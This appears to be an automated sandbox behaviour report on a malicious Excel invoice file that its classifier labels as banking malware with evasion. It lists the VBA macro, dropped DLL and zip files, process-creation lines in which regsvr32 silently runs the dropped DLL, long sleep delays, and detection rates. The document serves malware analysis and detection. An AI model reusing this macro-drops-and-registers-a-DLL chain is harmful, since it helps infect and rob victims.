    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76D20000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008A22A0 NtDelayExecution,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008BBE30 NtClose,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00895150
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008AE0A0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008BDCA0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008B50A0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008B4CA0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008B5CB0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008A88C0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008A8CC0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008A98DA
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0089ACD0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008AA0D0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008B1020
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008AD030
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008AD980
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008BD180
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008AC590
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0089F9A0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008AFDD0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008B89F0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008B71F0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008A7564
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00891570
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008AAE80
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008A8AB0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008B1EB0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008B26B0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008B3EC0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008BFA10
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00896AD0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008A96D0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008AF6E0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008AB6F0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008A8EF0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008B62F0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0089CA10
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008BFA10
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008B0220
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008BD620
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008B1240
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008AA660
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008B7660
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008B2E60
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00899E70
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008A9E70
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008A67C8
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008A83C0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008A7FC0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008B7FC0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008AE3F0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008B3B00
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008B9B10
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008B1730
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008ABF50
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008A5B60
    Source: Inv0209966048-20210111075675.xlsOLE, VBA macro line: Private Sub view_1_a_Layout(ByVal Index As Long)
    Source: VBA code instrumentationOLE, VBA macro: Module Sheet1, Function view_1_a_Layout
    Source: Inv0209966048-20210111075675.xlsOLE indicator, VBA macros: true
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1488
    Source: w80l82r[1].zip.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: w80l82r[1].zip.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: w80l82r[1].zip.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: w80l82r[1].zip.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: lwjmdgav.dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: lwjmdgav.dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: lwjmdgav.dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: lwjmdgav.dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: DWWIN.EXE, 00000007.00000002.2260615326.0000000003250000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
    Source: classification engineClassification label: mal100.bank.expl.evad.winXLS@9/18@1/5
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DATJump to behavior
    Source: C:\Windows\System32\DWWIN.EXEMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2028
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE407.tmpJump to behavior
    Source: Inv0209966048-20210111075675.xlsOLE indicator, Workbook stream: true
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
    Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\System32\DWWIN.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\System32\DWWIN.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: Inv0209966048-20210111075675.xlsVirustotal: Detection: 45%
    Source: Inv0209966048-20210111075675.xlsMetadefender: Detection: 16%
    Source: Inv0209966048-20210111075675.xlsReversingLabs: Detection: 34%
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\lwjmdgav.dll.
    Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\lwjmdgav.dll.
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1488
    Source: unknownProcess created: C:\Windows\System32\DWWIN.EXE C:\Windows\system32\dwwin.exe -x -s 1488
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\lwjmdgav.dll.
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1488
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\lwjmdgav.dll.
    Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXEProcess created: C:\Windows\System32\DWWIN.EXE C:\Windows\system32\dwwin.exe -x -s 1488
    Source: C:\Windows\System32\DWWIN.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{713AACC8-3B71-435C-A3A1-BE4E53621AB1}\InProcServer32
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: OK
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: OK
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10002140 LoadLibraryA,GetProcAddress,VirtualAlloc,VirtualAlloc,VirtualAlloc,
    Source: w80l82r[1].zip.0.drStatic PE information: section name: .rdata3
    Source: w80l82r[1].zip.0.drStatic PE information: section name: .2
    Source: w80l82r[1].zip.0.drStatic PE information: section name: .rdata2
    Source: w80l82r[1].zip.0.drStatic PE information: section name: .text4
    Source: lwjmdgav.dll.0.drStatic PE information: section name: .rdata3
    Source: lwjmdgav.dll.0.drStatic PE information: section name: .2
    Source: lwjmdgav.dll.0.drStatic PE information: section name: .rdata2
    Source: lwjmdgav.dll.0.drStatic PE information: section name: .text4
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\lwjmdgav.dll.
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000400A push esi; retf
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10010810 pushfd ; retf
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000D856 push ebp; retf
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000E8F3 pushad ; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10002140 push ecx; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1001CD9B push esp; retf
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000C265 push 588A19FDh; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10020A73 push edx; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000FEBF push eax; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000FEFA push 00000000h; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10023EFF push eax; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000C304 push 588A1BCDh; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10010307 push esp; retf
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000CF15 push 0000002Dh; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1001DB23 push eax; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10020B27 push eax; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000DFC7 pushad ; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10023FEB push edx; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_100107FB pushfd ; retf
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\lwjmdgav.dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\w80l82r[1].zipJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\w80l82r[1].zipJump to dropped file
    Source: C:\Windows\SysWOW64\regsvr32.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,LoadLibraryW,
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\w80l82r[1].zipJump to dropped file
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2932Thread sleep time: -360000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -405000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -528000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -334000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -337000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -720000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -700000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -417000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -638000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -396000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -705000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -123000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -279000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -328000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -504000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -698000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -1036000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -507000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -602000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -348000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -917000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -684000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -486000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -254000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -278000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -804000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -513000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -692000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -304000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -1120000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -744000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -326000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -532000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -358000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -318000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -468000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -316000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -272000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -642000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -715000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -150000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -411000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -314000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -153000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -255000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -588000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -525000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -292000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -310000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -712000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -290000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -477000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -453000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -351000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -512000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -608000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -292000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -327000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -532000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -552000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -328000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -568000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -650000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -488000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -331000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -244000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -387000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -265000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -320000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -512000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -604000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -483000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -322000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -245000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -120000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -332000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -253000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -263000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -516000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -375000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -356000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -353000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -260000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -157000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -341000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -1002000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -616000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -296000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -121000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -254000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -149000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -242000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -287000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -248000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -165000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -274000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -315000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -170000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -249000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -305000s >= -30000s
